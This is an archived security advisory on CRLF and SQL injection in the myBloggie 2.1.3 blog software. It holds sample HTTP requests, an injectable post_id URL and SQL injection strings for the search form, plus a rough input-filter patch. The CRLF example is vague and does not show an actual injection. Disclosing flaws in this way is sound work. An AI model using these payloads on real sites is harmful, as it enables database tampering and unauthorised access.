what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HYSA-2006-008.txt

HYSA-2006-008.txt
Posted May 22, 2006
Authored by matrix killer | Site h4cky0u.org

myBloggie version 2.1.3 is susceptible to CRLF and SQL injection attacks.

tags | exploit, sql injection
SHA-256 | 450a90581b32d4d771b1b5c3e091773978e9e5146b232cb85a5acaf3d71f4d15
Download | Favorite | View

HYSA-2006-008.txt

Change Mirror Download
------------------------------------------------------
      HYSA-2006-008 h4cky0u.org Advisory 017
------------------------------------------------------
Date - Wed May 17 2006


TITLE:
======

myBloggie 2.1.3 CRLF & SQL Injection 


SEVERITY: 
========= 

Medium 


SOFTWARE: 
========= 

myBloggie 2.1.3 

https://mybloggie.mywebland.com/ 


INFO: 
===== 

myBloggie is considered one of the most simple, user-friendliest yet packed with features 

Weblog system available to date. 


DESCRIPTION: 
============ 

--==CRLF injection==-- 

GET /mybloggie/ HTTP/1.0 
Accept: */* 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) 
Host: 127.0.0.1:80 
Cookie: PHPSESSID=op0-11{}};q, or something like that 
Connection: Close 

GET /mybloggie/admin.php HTTP/1.0 
Accept: */* 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) 
Host: 127.0.0.1:80 
Cookie: PHPSESSID=op0-11{}};q, or something like that 
Connection: Close 

GET /mybloggie/index.php HTTP/1.0 
Accept: */* 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0) 
Host: 127.0.0.1:80 
Cookie: PHPSESSID=op0-11{}};q, or something like that 
Connection: Close 

--==SQL injection==-- 

https://127.0.0.1/mybloggie/index.php?mode=viewid&post_id=' 

Also MurderSkillz discovered a bug in the search function. Here is a proof-of-concept: 

1' having '1'='1'-- 

or 

' or 'x'='x-- 

And a little patch from me: 

if(ereg('[^A-Za-z0-9_]',$_POST['keyword'])){ 
    echo "Invalid Characters"; 
    exit; 
    } 
    
if (isset($_GET['select'])) $select=$_GET['select']; 
if (isset($_POST['keyword'])) $keyword=$_POST['keyword']; 


$keyword = preg_replace($html_entities_match, $html_entities_replace,$keyword); 
//.... 
  

VENDOR STATUS: 
============== 

Vendor was contacted but no response received till date. 


CREDITS: 
======== 

This vulnerability was discovered and researched by 
matrix_killer of  h4cky0u Security Forums. 

mail : matrix_k at abv.bg 

web : https://www.h4cky0u.org 


Search function sql injection was discovered by:  MurderSkillz


Co-Researcher:
 
h4cky0u of h4cky0u Security Forums. 

mail : h4cky0u at gmail.com 

web : https://www.h4cky0u.org 

Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!


ORIGINAL ADVISORY:
==================

https://www.h4cky0u.org/advisories/HYSA-2006-008-mybloggie.txt
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close